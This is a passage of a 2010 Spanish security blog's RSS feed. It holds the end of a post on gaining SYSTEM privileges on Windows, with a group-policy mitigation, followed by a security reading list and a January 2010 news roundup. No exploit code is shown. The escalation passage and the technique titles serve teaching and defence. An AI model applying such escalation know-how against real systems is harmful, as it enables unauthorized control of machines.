&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Como podemos observar, se nos ha abierto otra consola en la que hemos ejecutado un "&lt;i&gt;whoami&lt;/i&gt;" y vemos que tenemos permisos de SYSTEM, y por lo tanto, pleno control de la máquina.&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Como ya he comentado, este solo sería el paso final de &lt;b&gt;escalada de privilegios&lt;/b&gt;, de modo que he obviado gran parte del trabajo de reconocimiento, análisis de vulnerabilidades, explotación de vulnerabilidades y obtención de usuario en el equipo objetivo.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
Por el momento, no existe ningún parche que solucione dicha vulnerabilidad, de modo que la única solución temporal es desde el Panel de Control impedir la ejecución de aplicaciones de 16 bits desde la consola de políticas.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;(gpedit.msc) --&amp;gt; "Configuración de equipo" --&amp;gt; "Plantillas administrativas" --&amp;gt; "Componentes de Windows" --&amp;gt; "Compatibilidad de aplicación" y habilitar la política "Impedir el acceso a aplicaciones de 16 bits".&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Saludos,&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1226522460380785602-4488781574357076600?l=www.securecorner.net' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/TheSecureCorner/~4/LLg7vPukwXM" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/TheSecureCorner/~3/LLg7vPukwXM/escalando-privilegios-en-windows.html</link><author>noreply@blogger.com (Ramon Vicens)</author><media:thumbnail url="http://1.bp.blogspot.com/_cF66r39b8uc/S2lR7oP3JlI/AAAAAAAAAE4/uVjA_-yem08/s72-c/Picture+1.png" height="72" width="72" /><feedburner:origLink>http://www.securecorner.net/2010/02/escalando-privilegios-en-windows.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1226522460380785602.post-4822678901017282144</guid><pubDate>Wed, 03 Feb 2010 09:17:00 +0000</pubDate><atom:updated>2010-02-03T10:17:51.539+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Otros</category><title>¿Os acordais de Windows 3.1?</title><description>Para los que tengan ganas de recordar los tiempos pasados, dejo &lt;a href="http://www.michaelv.org.nyud.net/"&gt;Aquí&lt;/a&gt; una referencia de una interfaz de Windows 3.1 desarrollada por Michael Vincent.&lt;br /&gt;
&lt;br /&gt;
Permite acceder a MS-DOS, al panel de control, navegador e incluso al mítico buscaminas!&lt;br /&gt;
&lt;br /&gt;
Saludos,&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1226522460380785602-4822678901017282144?l=www.securecorner.net' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/TheSecureCorner/~4/hv0tm1sxqs0" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/TheSecureCorner/~3/hv0tm1sxqs0/os-acordais-de-windows-31.html</link><author>noreply@blogger.com (Ramon Vicens)</author><feedburner:origLink>http://www.securecorner.net/2010/02/os-acordais-de-windows-31.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1226522460380785602.post-539369742136654585</guid><pubDate>Mon, 01 Feb 2010 22:33:00 +0000</pubDate><atom:updated>2010-02-01T23:35:17.349+01:00</atom:updated><title /><description>&lt;div style="text-align: justify;"&gt;Aquí dejo algunos libros y papers de interés. Espero en breve poder ir ampliando el contenido de esta sección.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: x-large;"&gt;Libros&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;
&lt;ul&gt;&lt;li style="text-align: justify;"&gt;&lt;i&gt;Hacking Exposed 6th Edition, &lt;/i&gt;Stuart McClure, Joel Scambray, George Kurtz&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;i&gt;Google Hacking for Penetration Testers&lt;/i&gt;, Johnny Long&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;i&gt;Windows Forensics Analysis&lt;/i&gt;, Harlan Carvey&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;i&gt;Análisis Forense Digital en Entornos Windows&lt;/i&gt;, Juan Garrido Caballero, Juan Luis G. Rambla, Chema Alonso&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: x-large;"&gt;Papers&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: medium;"&gt;Pentesting&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;
&lt;ul&gt;&lt;li style="text-align: justify;"&gt;&lt;a href="http://www.sans.org/reading_room/whitepapers/testing/why_crack_when_you_can_pass_the_hash_33219"&gt;Why Crack When You Can Pass the Hash?&lt;/a&gt;&amp;nbsp;(Christopher Hummel)&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;"&lt;i&gt;While the concept of passing a Windows password hash has been around for some time, the release of publicly available tools has taken the first major step towards harnessing the true power of this attack. Although such tools have not yet targeted Microsoft’s implementation of Kerberos, all organizations are strongly encouraged to move towards pure Kerberos deployments in preparation for PKI integration. The evolving nature of this attack puts under pressure the issue of passwords as a valid identifier thus requiring organizations to use an alternate credential form such as digital certificates.&lt;/i&gt;"&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;a href="http://www.sans.org/reading_room/whitepapers/testing/stack_based_overflows_detect_and_exploit_1986"&gt;Stack Based Overflows: Detect &amp;amp; Exploit&lt;/a&gt;&amp;nbsp;&amp;nbsp;(Morton Christiansen)&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;"&lt;i&gt;Buffer overflows remain some of the most serious and widespread vulnerabilities that exist, often giving an attacker complete control over the compromised system. Thus, in depth knowledge of how these vulnerabilities and exploits work is of utmost importance to penetration testers and incident handlers. This report provides the reader with a basic understanding of how stack based overflows work in practice. This is illustrated, while at the same time uncovering new vulnerabilities in the latest version of Windows XP.&lt;/i&gt;"&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;a href="http://www.sans.org/reading_room/whitepapers/testing/finding_dsniff_on_your_network_262"&gt;Finding dsniff on Your Network&lt;/a&gt;&amp;nbsp;(Richard Duffy)&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;"&lt;i&gt;This paper covers some ways to detect dsniff and two of its utilities, arpspoof and macof, on a network.&lt;/i&gt;"&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;The Pentest Perfect Storm (Kevin Johnson, Ed Skoulis, Joshua Wright)&amp;nbsp;&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;a href="http://www.inguardians.com/pubs/PenTestPerfectStormPart1FINAL.pdf"&gt;Part I&lt;/a&gt;&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;a href="http://inguardians.com/pubs/PenTestPerfectStormPart2FINAL.pdf"&gt;Part II&amp;nbsp;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;&lt;b&gt;Scripting&amp;nbsp;&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;
&lt;ul&gt;&lt;li style="text-align: justify;"&gt;&lt;a href="http://www.sans.org/reading_room/whitepapers/scripting/using_scripts_to_exploit_and_mitigate_risks_1313"&gt;Using Scripts to Exploit and Mitigate Risks&lt;/a&gt;&amp;nbsp;(Robert G. Rodriguez)&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;"&lt;i&gt;This paper discusses how scripts can best help you and your unique situations by covering some of the commands that really make a script what it is; powerful.&lt;/i&gt;"&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;a href="http://www.sans.org/reading_room/whitepapers/scripting/using_the_winbatch_scripting_language_to_automate_security_in_an_nt4_environment_381"&gt;Using The WinBatch Scripting Language To Automate Security In An NT4 Environment&lt;/a&gt;&amp;nbsp;(Terry Chapman)&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;"&lt;i&gt;In this document I will endeavor to guide you through a couple of relatively simple scripts in order to demonstrate that getting started with scripting is not as a daunting task as you may have considered.&lt;/i&gt;"&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-size: medium;"&gt;&lt;b&gt;Forensics&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;ul&gt;&lt;li style="text-align: justify;"&gt;&lt;a href="http://www.sans.org/reading_room/whitepapers/forensics/techniques_and_tools_for_recovering_and_analyzing_data_from_volatile_memory_33049"&gt;Techniques and Tools for Recovering and Analyzing Data from Volatile Memory&lt;/a&gt; (Kristine Amari)&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;"&lt;i&gt;There are many relatively new tools available that have been developed in order to recover and dissect the information that can be gleaned from volatile memory, but because this is a relatively new and fast-growing field many forensic analysts do not know or take advantage of these assets&lt;/i&gt;."&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;a href="http://www.sans.org/reading_room/whitepapers/forensics/data_carving_concepts_32969"&gt;Data Carving Concept&lt;/a&gt;s (Antonio Merola)&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;a href="http://www.sans.org/reading_room/whitepapers/forensics/mobile_device_forensics_32888"&gt;Mobile Device Forensics&lt;/a&gt; (Andrew Martin)&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;a href="http://www.sans.org/reading_room/whitepapers/forensics/forensic_analysis_of_a_compromised_intranet_server_1652"&gt;Forensic Analysis of a Compromised Intranet Server&lt;/a&gt; (Roberto Obialero)&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;"&lt;i&gt;This document details the forensic analysis process of a compromised Intranet server, from the verification stage to the dissection of malware code, supported by an explanation of the followed methodology&lt;/i&gt;."&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;a href="http://www.sans.org/reading_room/whitepapers/forensics/forensic_analysis_of_a_sql_server_2005_database_server_1906"&gt;Forensic Analysis of a SQL Server 2005 Database Server&lt;/a&gt; (Kevvie Fowler)&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;a href="http://www.utica.edu/academic/institutes/ecii/publications/articles/A0B13342-B4E0-1F6A-156F501C49CF5F51.pdf"&gt;A Ten Step Process for Forensic Readiness&lt;/a&gt; (Robert Rowlingson)&lt;/li&gt;
&lt;/ul&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;Misc&lt;/b&gt;&lt;/div&gt;&lt;ul&gt;&lt;li style="text-align: justify;"&gt;&lt;a href="http://www.willhackforsushi.com/Home/Entries/2009/2/3_Decrypting_DebIan-Vulnerable_SSH_Traffic.html"&gt;Decrypting Debian-Vulnerable SSH Traffic&lt;/a&gt;&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;a href="http://www.inguardians.com/research/docs/switched.pdf"&gt;Intrusion Detection Systems&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1226522460380785602-539369742136654585?l=www.securecorner.net' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/TheSecureCorner/~4/VwbGw7WcDoA" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/TheSecureCorner/~3/VwbGw7WcDoA/aqui-dejo-algunos-libros-y-papers-de.html</link><author>noreply@blogger.com (Ramon Vicens)</author><feedburner:origLink>http://www.securecorner.net/2010/02/aqui-dejo-algunos-libros-y-papers-de.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1226522460380785602.post-2976984814687198700</guid><pubDate>Mon, 01 Feb 2010 14:00:00 +0000</pubDate><atom:updated>2010-02-01T15:00:10.241+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Noticias</category><title>Recopilatorio Notícias Enero 2010</title><description>&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;Una nueva funcionalidad de Facebook puede convertirse en instrumento de ciberacoso&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;"Una funcionalidad lanzada recientemente por Facebook es explotable como herramienta de acoso si cae en malas manos, según ha advertido F-Secure.El propósito de tal funcionalidad es permitir a los usuarios de Facebook responder directamente desde sus cuentas de correo cuando reciben alguna notificación de llegada de nuevos correos que incluya mensajes publicados en sus cuentas Facebook. Pueden así responder sin necesidad de introducirse antes en el sitio de networking social, eliminando así un paso y, por consiguiente, ahorrando tiempo."&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;a href="http://www.idg.es/iworld/noticia.asp?id=89629"&gt;Leer Más&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;Google amenaza con retirarse de China&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;"Google amenazó con retirarse de China, al retirar los filtros en los resultados de su buscador web y plantear una serie de negociaciones con autoridades del gobierno asiático para considerar la viabilidad del servicio.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;La medida adoptada responde a una serie de ataques informáticos que registró la compañía estadounidense en las cuentas de Gmail de diversos activistas de derechos humanos localizados tanto en China como en Europa y Estados Unidos.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Pekín no realizó comentarios significativos desde que Google indicó que no acatará la censura y podría cerrar su servicios de búsquedas web, en lengua china, debido a los ataques cibernéticos a los disidentes que utilizaban su servicio Gmail y a compañías."&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;a href="http://www.lanacion.com.ar/nota.asp?nota_id=1221422"&gt;Leer Más&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;China lanzo varios ataques hacker contra compañías petroleras Americanas en el 2008&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;"Según ha revelado un reciente informe del THE MONITOR, un grupo de presuntos Hackers Chinos lanzaron ataques de hacking contra al menos tres compañías petroleras de los EE.UU. Marathon Oil, Exxon Mobil y Conoco Phillips, que se vieron afectadas por los asaltos hackers y según el informe publicado hoy en el Christian Science Monitor tenían como origen la RPC Republica Popular China. La reciente revelación de estos ataques se producen a raíz de que Google y al menos otras 30 empresas de alta tecnología fueron hace poco el blanco de los ataques de hackers chinos, cuyas investigaciones señalan como origen china. Los ataques hacker ejecutados en el 2008 se suman ahora a la creciente preocupación general por el aumento de la inseguridad que está emergiendo en Internet y han provocado una protesta formal de los Estados Unidos ante el Gobierno Chino, que ha negado inmediatamente cualquier participación en los ataque y ha afirmado que también ha sido víctima de numerosos ataques.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;El informe publicado por THE MONITOR está basado en cinco largos meses de investigaciones, y arroja como resultado docenas de computadoras y robos de datos a través de las tres empresas vulnerables a los ataques. Los robos de informaciones sensibles han sido posibles usando software espía que fue diseñado a medida para evadir cualquier tipo de detección y control que las empresas pudieran tener instalados como protección Informática. Al parecer el primer ataque ocurrió en noviembre de 2008, precisamente a través del envió de emails con la técnica (E-P) del e-mail Poison (e-mail envenenado) dirigidos a numerosos ejecutivos de alto nivel en las empresas. Las cartas, que contenían solicitudes de beneficiarios para analizar la Ley de Estabilización Económica, estaban falsificadas de tal modo que lograron engañar a los receptores haciéndoles creer que provenían de personas conocidas.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;"&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;a href="http://informaniaticos.blogspot.com/2010/01/china-lanzo-varios-ataques-hacker.html"&gt;Leer Más&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;Publican el código utilizado en el ataque a Google&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;"El ataque sufrido por Google y una treintena de empresas norteamericanas sigue arrastrando consecuencias. La última, el riesgo aún existente ante la publicación en una página web del código utilizado para perpetrar estos ataques. Por su parte, el gobierno alemán ha solicitado a los usuarios a buscar alternativas a la hora de utilizar el popular buscador y al uso de la versión de Explorer afectada por esta vulnerabilidad hasta que se solvente.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Cabe recordar que este ataque se ha producido a través de un fallo detectado, además de en determinados programas corporativos, en Internet Explorer 6 cuando se ejecuta sobre equipos con sistema operativo XP aunque, de acuerdo con Marcus, puede modificarse para su ejecución en versiones más recientes del navegador. Y es que, tal y como han descubierto, un hacker puede utilizar el código para ejecutar software no autorizado en el equipo de una víctima haciéndole creer que está viendo una página web que en realidad contiene código malicioso. "&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;Tras conflicto con Google, nace versión trucha en China&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;"Después de la reciente tensión entre el Gobierno Chino y la transnacional Google, una estudiante universitaria de ese país creó Goojje.com, una versión “trucha” del servidor.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;En China no sólo se copian DVD, ropa de marca o cadenas de café. Ahora, Goojje es la nueva versión china de Google, vigente desde el 14 de enero, sólo dos días después de que comenzara el conflicto entre el buscador de internet y las autoridades chinas por las cuentas de mail “hackeadas” y la censura."&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;a href="http://www.laprensa.com.bo/noticias/29-01-10/noticias.php?nota=29_01_10_mund2.php"&gt;Leer Más&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;Bienvenido a mis cuentas, la contraseña es 123456&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;"A pesar de las continuas recomendaciones de los expertos en seguridad informática, un informe revela que las claves utilizadas para acceder a diversos sistemas son tan simples como "abc123" o "password"&amp;nbsp;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Pese a todos los informes de violaciones de la seguridad de Internet a lo largo de los años, incluyendo los recientes ataques al servicio de correo electrónico de Google , los usuarios siguen sin reaccionar ante este tipo de situaciones.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Según un análisis, uno de cada cinco usuarios de la red aún decide dejar el equivalente digital de una llave bajo la maceta o la alfombra: eligen claves simples, fáciles de adivinar como "abc123", "iloveyou" o incluso "password" para proteger sus datos.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Imperva descubrió que casi el 1 por ciento e los 32 millones de personas analizadas utilizó la clave "123456". La segunda más popular fue "12345". Entre las 20 más populares también se incluyen "qwerty", "abc123" y "princess".&lt;/div&gt;&lt;div style="text-align: justify;"&gt;"&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;a href="http://www.lanacion.com.ar/nota.asp?nota_id=1224970"&gt;Leer Más&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;Nueve de cada diez correos electrónicos son fraudulentos&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;"Según un informe presentado hoy en Madrid por Norton, 9 de cada 10 correos electrónicos son fraudulentos y este tipo de mensajes sigue utilizándose "porque funciona". Asimismo, la compañía señala que la práctica de ciberdelitos está tan extendida que podría incluso superar los ingresos del tráfico de drogas internacional."&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;a href="http://www.islaremota.com/forum/showthread.php?t=25249"&gt;Leer Más&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;Detenidos en Madrid y Barcelona dos 'hackers' que atacaban páginas de internet&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;"La Policía Nacional ha detenido en Madrid y Barcelona a dos hackers o piratas electrónicos que atacaban múltiples páginas de internet, entre ellas las web de la Policía británica, de la Universidad de Harvard y las ediciones digitales de los diarios El País y As. También descargaban documentos y comunicaciones privadas de los usuarios de un foro.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Uno de los arrestados administraba una web, ahora clausurada por orden judicial, en la que publicaba artículos sobre técnicas y herramientas para llevar a cabo acciones de piratería en la Red, según ha informado la Policía. Los agentes averiguaron que las conexiones a internet se realizaban desde los domicilios de los detenidos, en Madrid y Barcelona."&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;a href="http://www.elperiodico.com/default.asp?idpublicacio_PK=46&amp;amp;idioma=CAS&amp;amp;idnoticia_PK=655543&amp;amp;idseccio_PK=1021"&gt;Leer Más&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;La Ley Orgánica de Protección de Datos cumple hoy una década&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;"La Ley Orgánica de Protección de Datos de Carácter Personal (LOPD) cumplirá hoy diez años de su entrada en vigor, que nació con el objetivo de hacer frente a los riesgos que para los derechos de la personalidad pueden suponer el acopio, tratamiento y utilización de datos personales y garantizar y proteger los derechos de los ciudadanos."&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;a href="http://www.adslnet.es/index.php/2010/01/14/la-ley-organica-de-proteccion-de-datos-cumple-hoy-una-decada/"&gt;Leer Más&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;Ratifican que Sanidad infringió la ley al divulgar datos de pacientes&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;"El Servicio Cántabro de Salud (SCS) infringió «gravemente» el deber de secreto recogido en la Ley Orgánica de Protección de Datos (LOPD) al colgar en el tablón de anuncios del Centro de Salud de Santoña datos personales de varios pacientes toxicómanos sometidos al tratamiento de metadona.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Así lo ha estimado la Audiencia Nacional en una sentencia que cierra la polémica suscitada en 2006, a raíz de la dispensación de metadona en los centros de salud. Esta decisión provocó un fuerte enfrentamiento entre grupos de médicos, apoyados por su organización colegial, y la administración sanitaria regional, polémica en la que terció también el Partido Popular, que pidió el «cese fulminante» del gerente de Atención Primaria de Santander-Laredo, José Manuel Liendo."&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;a href="http://www.eldiariomontanes.es/20100119/cantabria/ratifican-sanidad-infringio-divulgar-20100119.html"&gt;Leer Más&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;Aumentan las denuncias a la Agencia Española de protección de Datos&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;"Los ciudadanos presentaron más de 4.100 denuncias ante la Agencia Española de protección de Datos el pasado año, lo que supone un incremento del 75% respecto a 2008, cuando se contabilizaron 2.300 reclamaciones.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Así lo ha asegurado el director de la Agencia, Artemi Rallo, durante la presentación de Evalúa, una nueva herramienta ‘on line’ dirigida a empresas y organizaciones para que autoevalúen su grado de cumplimiento de la Ley Orgánica de Protección de Datos, coincidiendo con la celebración del Día Europeo de Protección de Datos."&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;a href="http://www.minutodigital.com/actualidad2/2010/01/28/aumentan-las-denuncias-a-la-agencia-espanola-de-proteccion-de-datos/"&gt;Leer Más&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;La Audiencia Nacional rebaja el afán recaudatorio de Protección de Datos&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;"El tribunal deja en 6.000 euros una multa de 60.000 que impuso la Agencia de Protección de Datos a una empresa de gestión de multas que envió datos erróneos de un conductor a un ayuntamiento referidos a una infracción de tráfico.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
